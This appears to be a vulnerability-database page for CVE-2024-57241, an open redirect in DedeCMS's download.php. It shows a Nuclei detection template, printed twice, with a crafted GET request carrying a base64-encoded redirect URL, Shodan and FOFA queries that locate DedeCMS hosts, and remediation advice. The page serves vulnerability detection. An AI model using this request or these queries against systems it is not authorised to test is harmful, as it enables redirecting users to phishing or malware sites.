DedeCMS - Open Redirect via download.php

CVE-2024-57241

Verified

Description

Dedecms 5.71sp1 and earlier contain a URL redirect caused by a logic error that does not properly validate GET request input, letting attackers redirect users to arbitrary URLs, exploit requires sending crafted GET requests.

Severity

Medium

CVSS Score

6.1

Exploit Probability

22%

Affected Product

dedecms

Published Date

March 29, 2026

Template Author

0x_akoko

CVE-2024-57241.yaml

id: CVE-2024-57241

info:
  name: DedeCMS - Open Redirect via download.php
  author: 0x_Akoko
  severity: medium
  description: |
    Dedecms 5.71sp1 and earlier contain a URL redirect caused by a logic error that does not properly validate GET request input, letting attackers redirect users to arbitrary URLs, exploit requires sending crafted GET requests.
  impact: |
    Attackers can redirect users to malicious sites, potentially leading to phishing or malware distribution.
  remediation: |
    Update to the latest version of Dedecms or apply security patches addressing URL redirect issues.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57241
    - https://github.com/woshidaheike/dedecms-url-redirection
  classification:
    cve-id: CVE-2024-57241
    epss-score: 0.21752
    epss-percentile: 0.95821
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 2
    vendor: dedecms
    product: dedecms
    shodan-query: 'http.title:"DedeCMS"'
    fofa-query: 'body="DedeCMS" || body="/plus/download.php"'
  tags: cve,cve2024,dedecms,redirect,cms

http:
  - raw:
      - |
        GET /plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA== HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'location == "https://interact.sh"'
        condition: and
# digest: 4a0a00473045022013cce1b30314ee51bb2d070580c5bb0556e04d410e79c1a316bd9a958313dec0022100fc486fc48b9cf3d31c7161f79b2bf3123f5fa0d9a4ddae3f409ae232b4e5cb63:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2024-57241

CWE ID:

cwe-601

References

https://nvd.nist.gov/vuln/detail/CVE-2024-57241 https://github.com/woshidaheike/dedecms-url-redirection

Remediation Steps

Update to the latest version of Dedecms or apply security patches addressing URL redirect issues.

id: CVE-2024-57241

info:
  name: DedeCMS - Open Redirect via download.php
  author: 0x_Akoko
  severity: medium
  description: |
    Dedecms 5.71sp1 and earlier contain a URL redirect caused by a logic error that does not properly validate GET request input, letting attackers redirect users to arbitrary URLs, exploit requires sending crafted GET requests.
  impact: |
    Attackers can redirect users to malicious sites, potentially leading to phishing or malware distribution.
  remediation: |
    Update to the latest version of Dedecms or apply security patches addressing URL redirect issues.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57241
    - https://github.com/woshidaheike/dedecms-url-redirection
  classification:
    cve-id: CVE-2024-57241
    epss-score: 0.21752
    epss-percentile: 0.95821
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 2
    vendor: dedecms
    product: dedecms
    shodan-query: 'http.title:"DedeCMS"'
    fofa-query: 'body="DedeCMS" || body="/plus/download.php"'
  tags: cve,cve2024,dedecms,redirect,cms

http:
  - raw:
      - |
        GET /plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA== HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'location == "https://interact.sh"'
        condition: and
# digest: 4a0a00473045022013cce1b30314ee51bb2d070580c5bb0556e04d410e79c1a316bd9a958313dec0022100fc486fc48b9cf3d31c7161f79b2bf3123f5fa0d9a4ddae3f409ae232b4e5cb63:922c64590222798bb761d5b6d8e72950

DedeCMS - Open Redirect via download.php

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

DedeCMS - Open Redirect via download.php

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps